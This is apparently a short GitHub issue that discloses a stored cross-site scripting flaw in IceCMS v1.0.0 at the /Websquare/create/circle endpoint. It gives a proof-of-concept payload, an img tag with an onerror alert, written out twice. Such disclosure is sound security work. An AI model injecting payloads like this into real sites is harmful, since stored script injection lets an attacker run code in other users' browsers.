Opened this issue 2 years ago · 0 comments
There is a Stored-XSS vulnerability in IceCMS v1.0.0
api : /Websquare/create/circle planet - circle
POC: The payload is <img src=1 onerror=alert(1)>
<img src=1 onerror=alert(1)>